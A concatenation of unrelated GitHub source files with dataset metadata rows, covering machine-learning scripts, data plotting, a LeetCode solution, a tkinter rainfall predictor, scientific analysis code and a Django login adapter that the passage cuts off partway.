# Construimos el modelo de aprendizaje con los datos de entrenamiento:
model_mlp = getModel()
model_mlp.compile(optimizer = 'adam', loss = tf.keras.losses.CategoricalCrossentropy())
model_mlp.fit(X_train, y_train, epochs = 100, verbose = 0)
# Realizamos predicciones con los datos de test sin permutaciones:
predicciones = model_mlp.predict(X_test)
# Para cada caracterรญstica:
for corte in range(0, 275, 25):
# Permutamos y realizamos predicciones:
x_permutacion = np.copy(X_test)
x_corte = X_test[:, corte:corte+25]
x_corte_permutacion = np.random.permutation(x_corte)
x_permutacion[:, corte:corte + 25] = x_corte_permutacion
pred_perm = model_mlp.predict(x_permutacion)
# Obtenemos la importancia:
importancia = ((np.argmax(y_test, axis = 1) - np.argmax(pred_perm, axis = 1))**2
- (np.argmax(y_test, axis = 1) - np.argmax(predicciones, axis = 1))**2)
M[indice_test, corte // 25] = importancia
contador_pliegues += 1
importancia_media = np.mean(M, axis = 0)
indices_ordenados = np.argsort(-1 * importancia_media)
cortes = np.arange(1, 12)
colores = ['forestgreen', 'limegreen', 'royalblue', 'blue', 'darkorange', 'cyan', 'purple', 'red', 'pink', 'yellow', 'coral']
fig, ax = plt.subplots(1, 2, figsize = (15, 4))
ax[0].bar(range(11), importancia_media[indices_ordenados], color = np.array(colores)[indices_ordenados])
ax[0].set_title('Importancia de cada caracterรญstica del modelo MLP')
ax[0].set_xticks(np.arange(11))
ax[0].set_xticklabels(cortes[indices_ordenados].astype(int))
ax[0].set_xlabel('Corte')
ax[0].set_ylabel('Importancia de cada caracterรญstica')
ecg_normalizado = (X[20, :] - X[20, :].min()) / (X[20, :].max() - X[20, :].min())
Importancia_caraceristica_normalizada = (importancia_media - importancia_media.min()) / (importancia_media.max() - importancia_media.min())
ax[1].plot(np.arange(len(ecg_normalizado)), ecg_normalizado, label='Datos ECG')
ax[1].plot(np.repeat(Importancia_caraceristica_normalizada, 25), label = 'Importancia de cada caracterรญstica')
ax[1].set_title('Importancia de cada caracterรญstica \npara el modelo MLP en una muestra de ECG')
ax[1].set_xlabel('Tiempo')
ax[1].set_ylabel('Seรฑal ECG / Importancia de cada caracterรญstica')
ax[1].legend()
|
Nestructor/Codigo_TFM_Aplicacion-del-Aprendizaje-Profundo-en-la-toma-de-Decisiones-Clinicas-Informadas
|
PFI.py
|
PFI.py
|
py
| 6,333
|
python
|
es
|
code
| 0
|
github-code
|
6
|
36774550355
|
class Solution(object):
def equalPairs(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
dic = defaultdict(int)
no_pair = 0
rows = len(grid)
cols = len(grid[0])
for i in range(rows):
dic[tuple(grid[i])] += 1
for j in range(cols):
temp_tupel = tuple([row[j] for row in grid])
no_pair += dic[temp_tupel]
return no_pair
|
nathy-min/Competitive-Programming
|
2352-equal-row-and-column-pairs/2352-equal-row-and-column-pairs.py
|
2352-equal-row-and-column-pairs.py
|
py
| 494
|
python
|
en
|
code
| 2
|
github-code
|
6
|
43216118551
|
import graphlab as gl
import urlparse
settings = {'client_log': 's3://dato-demo-metrics/client-logs',
'server_log_old': 's3://gl-testing-chris/log/strata-predictive-service-three_logs',
'server_log_old2': 's3://dato-stratanow/logs/stratanow_logs',
'server_log': 's3://dato-stratanow/log/strata-now_logs'}
def process_client(settings):
# Process client logs
client_logs = gl.SFrame.read_csv(settings['client_log'] + '/*.gz',
comment_char='#', delimiter='\t', header=False)
def parse_query_string(x):
return {k : v[0] for (k,v) in urlparse.parse_qs(x).iteritems()}
client_logs['params'] = client_logs['X12'].apply(lambda x: parse_query_string(x))
client_logs = client_logs.unpack('params')
client = client_logs[[c for c in client_logs.column_names() if c.startswith('params.se')]]
colnames = {k: k.replace('params.se_','') for k in client.column_names()}
#duid = user id
client = client.rename(colnames)
client['user'] = client_logs['params.duid']
client['date'] = client_logs['X1']
client['time'] = client_logs['X2']
client = client.rename({'pr': 'uuid',
'ac': 'event_type',
'la': 'item_id'})
return client
def process_server(settings):
server_logs = gl.SFrame.read_csv(settings['server_log'] + '/*custom.log', header=False)
return server_logs.unpack('X2', column_name_prefix='')\
.unpack('data', column_name_prefix='')
clientlogs = process_client(settings)
clientlogs.tail()
serverlogs = process_server(settings)
serverlogs.tail()
historical = serverlogs.join(clientlogs, on='uuid')
c = clientlogs[clientlogs['event_type']=='like']
c = c.rename({'user':'user_id'})
c = c.groupby(['user_id', 'item_id'], {})
train,test=gl.recommender.util.random_split_by_user(c)
m = gl.recommender.create(train)
m.evaluate(test)
|
turi-code/Strata-Now
|
data/metrics.py
|
metrics.py
|
py
| 1,912
|
python
|
en
|
code
| 4
|
github-code
|
6
|
42440314481
|
import plotly.express as px
import plotly.graph_objs as go
import pandas as pd
from sklearn.decomposition import PCA
import numpy as np
#****************** Rรฉcupรฉration des donnรฉes CSV ************************#
df = pd.read_csv("https://simplonline-v3-prod.s3.eu-west-3.amazonaws.com/media/file/csv/be67fa74-2c34-419c-9249-050394a7eb3e.csv")
# df2016 = df[df.year == 2016].iloc[:50,:]
# df2016['world_rank'] = df2016['world_rank'].replace(['=39'],'39')
# df2016['world_rank'] = df2016['world_rank'].replace(['=44'],'44')
# df2016['world_rank'] = df2016['world_rank'].replace(['=47'],'47')
# df2016["num_students"] = [str(each).replace(',', '') for each in df2016["num_students"]]
df2016 = df[df.year == 2016].iloc[:58,:] # 8lines contains "NaN"
df2016
df2016 = df2016.dropna()
df2016.isnull().sum()
print(len(df2016))
df2016
def convertGender (x):
a, b= x.split(':')
c = format(int(a)/int(b), ".2f")
return c
df2016['female_male_ratio'] = df2016['female_male_ratio'].apply(convertGender)
df2016.world_rank = [int(each.replace('=','')) for each in df2016.world_rank]
df2016['international_students'] = df2016['international_students'].str.replace(r'%', r'.0').astype('float') / 100.0
df2016['num_students'] = df2016['num_students'].str.replace(r',', r'.').astype('float')
df2016['income'] = df2016['income'].astype('float')
df2016['international'] = df2016['international'].astype('float')
df2016['total_score'] = df2016['total_score'].astype('float')
df_2016 = df2016.drop(['year', 'university_name','country'], axis=1)
#nombre d'observations
n = df_2016.shape[0]
#nombre de variables
p = df_2016.shape[1]
# figure1
fig1 = px.scatter(df2016, x="country", y="world_rank", color="country")
fig1.update_layout(clickmode='event+select')
fig1.update_traces(marker_size=20)
# figure2
trace1 = go.Scatter( x = df2016.world_rank,y = df2016.citations,
mode = "lines", name = "citations",marker = dict(color = 'rgba(16, 112, 2, 0.8)'),text = df.university_name)
trace2 = go.Scatter( x = df2016.world_rank,y = df2016.teaching,
mode = "lines+markers",name = "enseignement",marker = dict(color = 'rgba(80, 26, 80, 0.8)'),text = df.university_name)
data = [trace1, trace2]
layout = dict(title = 'Citation et enseignement comparรฉ au classement mondial des 50 meilleures universitรฉs en 2016',
xaxis = dict(title = 'Rang Mondial',ticklen = 5,zeroline= False))
fig2 = dict(data = data, layout = layout)
# figure3
fig3 = px.scatter(df2016, x="num_students", y="citations",color="country")
fig3.update_layout(clickmode='event+select')
fig3.update_traces(marker_size=20)
# figure3
fig4 = px.scatter(df2016, x="world_rank", y="citations",color="country")
fig4.update_layout(clickmode='event+select')
fig4.update_traces(marker_size=20)
############### Figures pour page 2 ######################
# PCA
#1- FIRST-FIG
df_2016 = df2016.drop(['year', 'university_name','country'], axis=1)
#features = ["sepal_width", "sepal_length", "petal_width", "petal_length"]
features = ['world_rank','teaching','research','citations',]
fig5 = px.scatter_matrix(
df_2016,
dimensions=features,
#color="species"
)
fig5.update_traces(diagonal_visible=False)
# 2- ACP-FIG
pca = PCA(n_components=4)
components = pca.fit_transform(df_2016)
labels = {
str(i): f"PC {i+1} ({var:.1f}%)"
for i, var in enumerate(pca.explained_variance_ratio_ * 100)
}
fig6 = px.scatter_matrix(
components,
labels=labels,
dimensions=range(4),
)
fig6.update_traces(diagonal_visible=False)
# 3- cumsum pca.explained variance
pca2 = PCA()
pca2.fit(df_2016)
val_prop = ((n-1)/n*pca2.explained_variance_)/100
exp_var_cumul = np.cumsum(pca2.explained_variance_ratio_)
fig7 = px.area(
x=range(1, exp_var_cumul.shape[0] + 1),
y=exp_var_cumul,
labels={"x": "# Components", "y": "cumul_variance"}
)
fig8 = px.area(
x=range(1, val_prop.shape[0] + 1),
y=val_prop,
labels={"x": "# Components", "y": "variance"}
)
|
AbdiNi/Plotly-Dash
|
Dash_Plotly/My_dataset.py
|
My_dataset.py
|
py
| 4,007
|
python
|
en
|
code
| 0
|
github-code
|
6
|
29059896663
|
import imageio
import torch
import torch.nn.functional as F
import numpy as np
import os, argparse
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from net.bgnet import Net
from utils.tdataloader import test_dataset
parser = argparse.ArgumentParser()
parser.add_argument('--testsize', type=int, default=416, help='testing size')
parser.add_argument('--pth_path', type=str, default='./checkpoints/best/BGNet.pth')
for _data_name in ['CAMO','CHAMELEON','COD10K','NC4K']:
data_path = './data/TestDataset/{}/'.format(_data_name)
save_path = './results/BGNet/{}/'.format(_data_name)
opt = parser.parse_args()
model = Net()
model.load_state_dict(torch.load(opt.pth_path))
model.cuda()
model.eval()
os.makedirs(save_path, exist_ok=True)
os.makedirs(save_path+'edge/', exist_ok=True)
image_root = '{}/Imgs/'.format(data_path)
gt_root = '{}/GT/'.format(data_path)
test_loader = test_dataset(image_root, gt_root, opt.testsize)
for i in range(test_loader.size):
image, gt, name = test_loader.load_data()
gt = np.asarray(gt, np.float32)
gt /= (gt.max() + 1e-8)
image = image.cuda()
_, _, res, e = model(image)
res = F.upsample(res, size=gt.shape, mode='bilinear', align_corners=False)
res = res.sigmoid().data.cpu().numpy().squeeze()
res = (res - res.min()) / (res.max() - res.min() + 1e-8)
imageio.imwrite(save_path+name, (res*255).astype(np.uint8))
# e = F.upsample(e, size=gt.shape, mode='bilinear', align_corners=True)
# e = e.data.cpu().numpy().squeeze()
# e = (e - e.min()) / (e.max() - e.min() + 1e-8)
# imageio.imwrite(save_path+'edge/'+name, (e*255).astype(np.uint8))
|
thograce/BGNet
|
etest.py
|
etest.py
|
py
| 1,718
|
python
|
en
|
code
| 57
|
github-code
|
6
|
38049723382
|
import sys
import os
import yaml
import json
CUSTOM_WORD_LIST_FILENAME = '.wordlist.txt'
def find_wordlist_files(path):
wordlist_paths = []
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith(CUSTOM_WORD_LIST_FILENAME):
wordlist_paths.append(os.path.join(root, file))
return wordlist_paths
if __name__ == '__main__':
spell_check_yaml_path = sys.argv[1]
markdown_base_path = sys.argv[2]
spell_check_yaml = None
with open(spell_check_yaml_path, 'r') as read_file:
spell_check_yaml = yaml.load(read_file, Loader=yaml.FullLoader)
wordlist_paths = find_wordlist_files(markdown_base_path)
print("Adding wordlists: ")
print("\n".join(wordlist_paths))
spell_check_yaml['matrix'][0]['dictionary']['wordlists'].extend(wordlist_paths)
with open(spell_check_yaml_path + ".tmp", 'w') as write_file:
#yaml.dump doesn't work in Python >3, so we dump to JSON instead & convert using yq in the outer script
#yaml.dump(write_file, spell_check_yaml, Dumper=yaml.Dumper)
json.dump(spell_check_yaml, write_file, indent=4)
|
actions-marketplace-validations/jordanbean-msft_wth-spell-check-action
|
generate-spellcheck.py
|
generate-spellcheck.py
|
py
| 1,153
|
python
|
en
|
code
| 0
|
github-code
|
6
|
3962586718
|
import sys
import os
import random
import matplotlib.pyplot as plt
from typing import List
BASE_FILENAME="develop"
OUTPUT_TYPE="png"
def create_pie_chart(keywords: List[str], base_filename: str, output_type: str):
data = []
explode = []
biggest_value = 0
biggest_iterator = 0
for i, _ in enumerate(keywords):
random_value = random.randint(10, 100)
data.append(random_value)
explode.append(0)
if random_value >= biggest_value:
biggest_iterator = i
biggest_value = random_value
explode[biggest_iterator] = 0.1
fig1, ax1 = plt.subplots()
ax1.set_xlabel("Distribution of value")
ax1.pie(data, explode=explode, labels=keywords, autopct='%1.1f%%',
shadow=True, startangle=90)
ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.
plt.savefig(f"outputs/{base_filename}_pie.{output_type}")
def create_bar_chart(keywords: List[str], base_filename: str, output_type: str):
data = []
for _ in keywords:
data.append(random.randint(5, 40))
plt.xlabel('Option')
plt.ylabel('Annual savings in percent')
plt.bar(keywords, data)
plt.savefig(f"outputs/{base_filename}_bar.{output_type}")
def main():
keywords = []
for i, element in enumerate(sys.argv):
if i == 0:
continue
keywords.append(element)
print(f"Your important {len(keywords)} keywords are: {keywords}")
create_bar_chart(keywords, BASE_FILENAME, OUTPUT_TYPE)
create_pie_chart(keywords, BASE_FILENAME, OUTPUT_TYPE)
print("Your important graphs were created")
if __name__=="__main__":
main()
|
neilschark/bullshitgraphs
|
bullshitgraphs/bullshitgraphs.py
|
bullshitgraphs.py
|
py
| 1,675
|
python
|
en
|
code
| 1
|
github-code
|
6
|
962892446
|
from tkinter import *
from tkinter.messagebox import showinfo
import pandas as pd
import numpy as np
import sklearn as sk
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
# function call
def cal():
data = pd.read_csv("2a.csv")
if (var1.get()=='123'):
showinfo("Invalid input", "please select a state")
df = pd.DataFrame(data,
columns=['SUBDIVISION', 'YEAR', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP',
'OCT', 'NOV', 'DEC'])
data= df.loc[df['SUBDIVISION'] == var1.get()]
x = data['YEAR']
x = x.values.reshape(-1, 1)
# x=x.drop(['Unnamed: 0'],axis=1)
if (var.get()=='123'):
showinfo("Invalid input", "please select a month")
y = data[var.get()]
y = y.values.reshape(-1, 1)
clf = LinearRegression()
clf.fit(x, y)
v = int(Year.get())
if (v<=0 and v>10000 ):
showinfo("Invalid input", "please use a valid year")
inp = np.array(v)
inp = inp.reshape(1, -1)
# Print output
showinfo("output",f"The precipitation in inches for the input is:,{clf.predict(inp)}")
# year_index = 100
# year = [i for i in range(v-50,v+50)]
plt.scatter(x, y, color='g',marker= ".")
plt.scatter(v, clf.predict(inp), color='b',label=f"Predicted value {clf.predict(inp)} in {Year.get()}",marker= "*")
v=max(v,2015)
x1=[1901,v]
y1=[clf.predict([[1901]])[0][0],clf.predict([[v]])[0][0]]
plt.plot(x1,y1,color='r',label=f"linear prediction from 1901 to {v} ")
plt.title('Precipitation level')
plt.xlabel('Year')
plt.ylabel(f"Precipitation for {var.get()}")
plt.legend()
# Plot a graph of precipitation levels vs n# of days
plt.show()
#GUI
root=Tk()
root.geometry("600x600")
# root.title("rainfall prediction")
Label(root, text="Enter year and choose any one of these",font="any 15 underline",fg="#f58d25").grid(row=0,column=3,ipady=10)
Label(root, text=" Year =",font="any 13 bold",foreground="#853535").grid(row=1,column=1)
Year=Entry(root,justify=LEFT,bg="#cafad2",font="any 12 bold",fg="red")
Year.grid(row=1,column=2,ipady=5,pady=17,ipadx=15)
var=StringVar()
var.set("123")
Radiobutton(root,text="Jan",variable=var, value="JAN",font="any 12",foreground="blue").grid(row=3,column=2)
Radiobutton(root,text="Feb",variable=var, value="FEB",font="any 12",foreground="blue").grid(row=4,column=2)
Radiobutton(root,text="Mar",variable=var, value="MAR",font="any 12",foreground="blue").grid(row=5,column=2)
Radiobutton(root,text="Apr",variable=var, value="APR",font="any 12",foreground="blue").grid(row=6,column=2)
Radiobutton(root,text="May",variable=var, value="MAY",font="any 12",foreground="blue").grid(row=7,column=2)
Radiobutton(root,text="Jun",variable=var, value="JUN",font="any 12",foreground="blue").grid(row=8,column=2)
obj=['ANDAMAN & NICOBAR ISLANDS', 'ARUNACHAL PRADESH', 'ASSAM & MEGHALAYA', 'NAGA MANI MIZO TRIPURA', 'GANGETIC WEST BENGAL', 'ORISSA', 'JHARKHAND', 'BIHAR', 'EAST UTTAR PRADESH', 'WEST UTTAR PRADESH', 'UTTARAKHAND', 'HARYANA DELHI & CHANDIGARH', 'PUNJAB', 'HIMACHAL PRADESH', 'JAMMU & KASHMIR', 'WEST RAJASTHAN' , 'EAST RAJASTHAN', 'WEST MADHYA PRADESH', 'EAST MADHYA PRADESH', 'GUJARAT REGION', 'SAURASHTRA & KUTCH', 'KONKAN & GOA', 'MADHYA MAHARASHTRA', 'MATATHWADA', 'VIDARBHA', 'CHHATTISGARH', 'COASTAL ANDHRA PRADESH', 'TELANGANA', 'RAYALSEEMA', 'TAMIL NADU', 'COASTAL KARNATAKA', 'NORTH INTERIOR KARNATAKA', 'SOUTH INTERIOR KARNATAKA', 'KERALA', 'LAKSHADWEEP',]
var1=StringVar()
var.set('ANDAMAN & NICOBAR ISLANDS')
OptionMenu(root,var1,*obj).grid(row=9,column=2)
Label(root, text=" Select -> :)",font="any 13 bold",foreground="#853535").grid(row=9,column=1)
Button(text="Calculate Now", command=cal, activebackground = "yellow",border=5).grid(row=11,column=2,pady=20,ipadx=25)
root.mainloop()
|
Santonu-Naskar/Rainfall-Prediction
|
rainfall/main/main1.py
|
main1.py
|
py
| 3,959
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73652302269
|
# ็ผๅไธไธชๅฝๆฐ๏ผ่พๅ
ฅๆฏไธไธชๆ ็ฌฆๅทๆดๆฐ๏ผไปฅไบ่ฟๅถไธฒ็ๅฝขๅผ๏ผ๏ผ่ฟๅๅ
ถไบ่ฟๅถ่กจ่พพๅผไธญๆฐๅญไฝๆฐไธบ '1' ็ไธชๆฐ๏ผไน่ขซ็งฐไธบๆฑๆ้้๏ผใ
class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
ret = 0
while n:
n &= n - 1
ret += 1
return ret
|
xxxxlc/leetcode
|
Bit/hammingWeight.py
|
hammingWeight.py
|
py
| 397
|
python
|
zh
|
code
| 0
|
github-code
|
6
|
27137014730
|
#Programmer Sadiq
#By@Sadiqul Islam
#Use of sum() function
#sum() function
#Syntax of sum() function : sum(iterable,start)
#If you want to add all element of list.So you use it
#Example 1
list1 = list(range(0,11)) #list
app = sum(list1,0) #use of sum() function
print(app) #add element of list
#Example 2
numbers = [2.5,3,4,-5]
sum1 = sum(numbers) #start parameter is not provided
print(sum1)
sum2 = sum(numbers,10) #use of start parameter
print(sum2)
|
swesadiqul/python-list
|
sum() function.py
|
sum() function.py
|
py
| 470
|
python
|
en
|
code
| 0
|
github-code
|
6
|
2053821942
|
from config import dogs_and_cats_config as config
from pyimagesearch.preprocessing import ImageToArrayPreprocessor, MeanPreprocessor, CropPreprocessor
from pyimagesearch.io import HDF5DatasetGenerator
from keras.models import load_model
import progressbar
import json
import numpy as np
import cv2
import argparse
import pandas as pd
# construct argument parser and parse the argument
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submit', required=True, help='path to submission file')
args = vars(ap.parse_args())
# load RGB means for json
means = json.loads(open(config.DATASET_MEAN).read())
# initialize image preprocessors
mp, cp, iap = MeanPreprocessor(means['R'], means['G'], means['B']), CropPreprocessor(227, 227), ImageToArrayPreprocessor()
# load model
print('[INFO] loading model...')
model = load_model(config.MODEL_PATH)
# initialize dataset generator
test_gen = HDF5DatasetGenerator(config.PUBLIC_TEST_HDF5, batch_size=64, preprocessors=[mp])
preds = []
# initialize progressbar
widgets = ['Evaluating: ', progressbar.Percentage(), ' ', progressbar.Bar(), ' ', progressbar.ETA()]
pbar = progressbar.ProgressBar(maxval=test_gen.num_images//64, widgets=widgets)
# loop over single pass of test data
for i, (images, labels) in enumerate(test_gen.generator(passes=1)):
# loop over individual images
for image in images:
# apply crop preprocessor
crops = cp.preprocess(image)
crops = np.array([iap.preprocess(crop) for crop in crops], dtype='float32')
# predict on the crops
pred = model.predict(crops)
preds.append(pred.mean(axis=0))
pbar.update(i)
pbar.finish()
# read sample submission
df = pd.DataFrame({
'id': np.array(range(1, test_gen.num_images+1)),
'label': np.array(preds).argmax(axis=1)
})
df.to_csv(args['submit'])
# close database
test_gen.close()
|
lykhahaha/Mine
|
PractitionerBundle/chapter10-dogs_vs_cats/crop_accuracy_public_test.py
|
crop_accuracy_public_test.py
|
py
| 1,859
|
python
|
en
|
code
| 0
|
github-code
|
6
|
30192351629
|
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_iris
iris = load_iris()
X = iris.data
y = iris.target
def sigmoid(inX):# ๅฎไนsigmoidๅฝๆฐ
return 1.0/(1+np.exp(-inX))
def std_data(X):
means = X.mean(axis=0) #ๅๅผ
stds = X.std(axis=0) #ๆ ๅๅทฎ
A=X.shape[0] #ๆ ทๆฌไธชๆฐ
B= X.shape[1] + 1 #ๅๆฐ็ปดๅบฆ
X_std = np.ones((A, B))
X_std[:, 1:] = (X - means) / stds
return X_std
def predict(Pw): #ๅ็กฎ็
y_pred=[]
for p in Pw:
P=list(p)
y_pred.append(P.index(max(P)))
return y_pred
def gradAscent(X_train,y_train,K_num):#ๆขฏๅบฆไธ้ๆณ่งฃๆๅผ
loss=[]
ks = list(set(y_train))
N=X_train.shape[0] # Nๆ ทๆฌๆฐ๏ผ
M = X_train.shape[1] + 1 #Mๅๆฐๅ้็็ปด
data = std_data(X_train)
Weight = np.zeros((K_num - 1, M)) # ๅญๅจๅๆฐ็ฉ้ต
temp=[1.0 / N * np.sum(data[y_train == ks[i]], axis=0) for i in range(K_num - 1)]
priEs = np.array(temp) # ๆๆๅผ
for i in range(1000):
wx = np.exp(np.dot(Weight, data.transpose()))
probs = np.divide(wx, 1 + np.sum(wx, axis=0).transpose())
pEs = 1.0 / N * np.dot(probs, data)
loss.append(np.sum(pEs-priEs))
gradient = pEs - priEs + 1.0 /100 * Weight # ๆขฏๅบฆ
Weight = Weight - gradient # ไฟฎๆญฃๅๆฐ
plt.figure()
x=[i for i in range(1000)]
plt.plot(x,loss)
plt.title('loss line')
plt.xlabel('number')
plt.ylabel('loss')
plt.show()
return Weight
def LogisticRegression(Weight,K,X_test):
N1= X_test.shape[0]
data=std_data(X_test)
prob = np.ones((N1,K))
prob[:,:-1] = np.exp(np.dot(data,Weight.transpose()))
prob =prob/ np.array([np.sum(prob,axis = 1)]).transpose() #ๆฆ็
return prob
def main():
split_list = [0.1, 0.3, 0.5]# ่ฝฝๅ
ฅๆฐๆฎ
for i in split_list:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=i)
K_num = np.shape(list(set(y_train)))[0]
W = gradAscent(X_train, y_train, K_num)
prob = LogisticRegression(W, K_num, X_test)
y_pre = predict(prob)
print("ๆต่ฏ้:{} ๅ็กฎ็:{}".format(i, accuracy_score(y_pre, y_test)))
if __name__ == "__main__":
main()
|
TJPU-ML/Homework-for-the-fall-semester-of-2018
|
iris classification/็็็
/lris.py
|
lris.py
|
py
| 2,416
|
python
|
en
|
code
| 0
|
github-code
|
6
|
30950837477
|
def D0(fp):
Dt = 1
taur = 1./(3*Dt)
return fp**2*taur/2.
def rms(fp,ts):
Dt = 1
taur = 1./(3*Dt)
d = 2
tts = ts*1e-5
return 4*Dt*tts+fp**2*taur**2/(d*(d-1))*(2*d*tts/taur+np.exp(-2*d*tts/taur)-1)
def swim(fp,rho):
Dt = 1
taur = 1./(3*Dt)
return rho*fp*fp*taur/2.0
if __name__=="__main__":
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append('../../plotting_scripts')
from jupyterplots import JupyterPlots
sys.path.append('../../analysis_scripts')
from logloader import LogLoader
figsize = JupyterPlots()
prefix1 = 'data2/'
tcut = -1
fps = np.array([1,5,10,20,40,60,80,100],int)
# density (in lj units)
rho = '0.7'
fig,axarr = plt.subplots(2,sharex=True,figsize=[figsize[0],figsize[0]*2])
fp = 100
fname = f'pressure_{fp}_{rho}'
ll = LogLoader(prefix1 + f'log_{fp}_{rho}.lammps.log')
ts = ll.data['Step']
RMSs = ll.data['c_mymsdd[4]']
Ps = ll.data['c_press']
Ds = ll.data['v_Diff']
#data = np.loadtxt(prefix1 + fname + '.txt.fixprint')
#ts = data[:,0]
#Ts = data[:,1]
#Ds = data[:,2]
#Ps = data[:,3]
#tcut = 200000
print(ts)
#axarr[0].plot(ts[1:],np.gradient(RMSs,ts)[1:]/4e-5,'o',label=rf'$f_p={fp}$')
axarr[0].plot(ts,RMSs,'o',label=rf'$f_p={fp}$')
axarr[0].plot(ts,rms(fp,ts),'k-')
#axarr[0].plot(ts,D0(fp)+0*ts,'k-')
#axarr[0].plot(ts[1:],Ds[1:],'.',label=rf'$f_p={fp}$')
axarr[1].plot(ts,Ps,'o',label=rf'$f_p={fp}$')
axarr[1].plot(ts,swim(fp,float(rho))+ts*0,'k-',label=rf'$f_p={fp}$')
axarr[0].set_ylabel(r'$<R^2>$')
axarr[1].set_ylabel(r'$P_{eff}$')
axarr[1].set_xlabel(r'$t$')
fig.savefig('results_single_pressure/' + fname + '.pdf')
plt.show()
|
samueljmcameron/ABPs_coarse_graining
|
experiments/2020_03_31/no_interactions_pressure/single_pressure.py
|
single_pressure.py
|
py
| 1,818
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73279162747
|
import numpy as np
import matplotlib.pyplot as plt
# system variables
fs = 100e3
f = 1e3
phi = np.pi/4
N = 4*fs/f
n_var = 0.01
# create some empty vectors to fill
x = np.zeros(N, dtype=complex)
n_a = np.zeros(N, dtype=complex)
e = np.zeros(N)
w = np.zeros(N)
y = np.zeros(N, dtype=complex)
y_ = np.zeros(N, dtype=complex)
w_ = np.zeros(N)
# loop through performing esitmation
for n in xrange(int(N)):
# create reference signal
x[n] = np.exp(1j*(2*n*np.pi*f/fs + phi))
# create noise to get received signal
n_a[n] = float(np.random.normal(0, np.sqrt(n_var), 1)) + 1j*float(np.random.normal(0, np.sqrt(n_var), 1))
y[n] = x[n] + n_a[n]
# create the estimated signal
y_[n] = np.exp(1j*sum(w_))
# create the error signal
e[n] = y[n] * y_[n]
# create new frequency estimate
w_[n] = e[n]
# plot the results
plt.plot(np.real(x))
plt.plot(np.imag(y_))
plt.title("Maximum Likelihood Phase Estimation")
plt.xlabel("samples")
plt.ylabel("amplitude")
plt.show()
|
yrrapt/ada-comms
|
sinusoid_estimate_noise.py
|
sinusoid_estimate_noise.py
|
py
| 1,012
|
python
|
en
|
code
| 0
|
github-code
|
6
|
12242514248
|
#!/usr/bin/env python
from rootpy import ROOT
from rootpy.io import File
from rootpy.tree import Tree
from collections import deque
def find_maintenance(filename):
aux_file = File(filename, 'read')
aux_tree = aux_file.get('t_hk_obox')
maintenance_start = False
maintenance_list = []
gps_time_list = []
ship_time_list = []
for entry in aux_tree:
if entry.obox_is_bad > 0: continue
if entry.obox_mode.encode('hex') == '04':
if not maintenance_start:
maintenance_start = True
gps_time_list.append(entry.abs_gps_week * 604800 + entry.abs_gps_second)
ship_time_list.append(entry.abs_ship_second)
else:
if maintenance_start:
maintenance_start = False
maintenance_list.append(((ship_time_list[0] + ship_time_list[-1]) / 2, (gps_time_list[0] + gps_time_list[-1]) / 2))
gps_time_list = []
ship_time_list = []
return [(int(x[0]), "%d:%d" % (int(x[1] / 604800), int(x[1] % 604800))) for x in maintenance_list]
def find_orbitstart(filename):
LAT_LEN = 500
lat_deque = deque()
orbitstart_list = []
ppd_file = File(filename, 'read')
ppd_tree = ppd_file.get('t_ppd')
ready_flag = True
pre_diff = 0.0
cur_diff = 0.0
for entry in ppd_tree:
if entry.flag_of_pos != 0x55: continue
lat_deque.append((entry.latitude, entry.ship_time_sec, entry.utc_time_sec))
if len(lat_deque) < LAT_LEN:
pre_diff = lat_deque[-1][0] - lat_deque[0][0]
continue
else:
lat_deque.popleft()
cur_diff = lat_deque[-1][0] - lat_deque[0][0]
if ready_flag and pre_diff < 0 and cur_diff >= 0:
orbitstart_list.append(((lat_deque[-1][1] + lat_deque[0][1]) / 2, (lat_deque[-1][2] + lat_deque[0][2]) / 2))
ready_flag = False
if not ready_flag and pre_diff > 0 and cur_diff <= 0:
ready_flag = True
pre_diff = cur_diff
return [(int(x[0]), "%d:%d" % (int(x[1] / 604800), int(x[1] % 604800))) for x in orbitstart_list]
|
ZhenghengLi/POLAR_DATA
|
Preprocessing/script/split_time.py
|
split_time.py
|
py
| 2,130
|
python
|
en
|
code
| 2
|
github-code
|
6
|
2568321990
|
from DATA.datamanager import Datamanager
dm=Datamanager()
"""
woorden=dm.alle_woorden()
for woord in woorden :
print (woord[1] )
woord = "abluties"
woord=dm.check_by_zoekterm(woord,woord[0])
print (woord)
"""
woord = "daar"
woord=dm.check_by_zoekterm_alle_woorden(woord)
print (woord)
"""a="test"
print (len(a))
print ("e" in a )
print (("0" or "e") not in a)
print (a[0].upper())
#Aรยคron
#ยค
raarletters = "`รฅ` `รง` `รฑ``ร
``รค` `รซ` `รฏ` `รถ` `รผ` en `รข` `รช` `รฎ` `รด` `รป`"
print (raarletters.upper())"""
|
johangoyvaerts/PhytonicWordGame-johan
|
test.py
|
test.py
|
py
| 523
|
python
|
en
|
code
| 0
|
github-code
|
6
|
18446576990
|
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponseRedirect
from allauth.account import signals
from allauth.account.adapter import DefaultAccountAdapter
class AccountAdapter(DefaultAccountAdapter):
def is_open_for_signup(self, request):
return getattr(settings, "ACCOUNT_SIGNUP_OPEN", True)
def post_login(self, request, user, *, email_verification, signal_kwargs, email, signup, redirect_url):
# Copied form https://github.com/pennersr/django-allauth/blob/master/allauth/account/adapter.py#L441 in order
# to remove the "logged in" message. See this issue for more information: https://github.com/pennersr/django-allauth/issues/3205
from allauth.account.utils import get_login_redirect_url
response = HttpResponseRedirect(get_login_redirect_url(request, redirect_url, signup=signup))
if signal_kwargs is None:
signal_kwargs = {}
signals.user_logged_in.send(
sender=user.__class__,
request=request,
response=response,
user=user,
**signal_kwargs,
)
if getattr(settings, "ACCOUNT_SHOW_POST_LOGIN_MESSAGE", True) is True:
self.add_message(
request,
messages.SUCCESS,
"account/messages/logged_in.txt",
{"user": user},
)
return response
|
epicserve/django-base-site
|
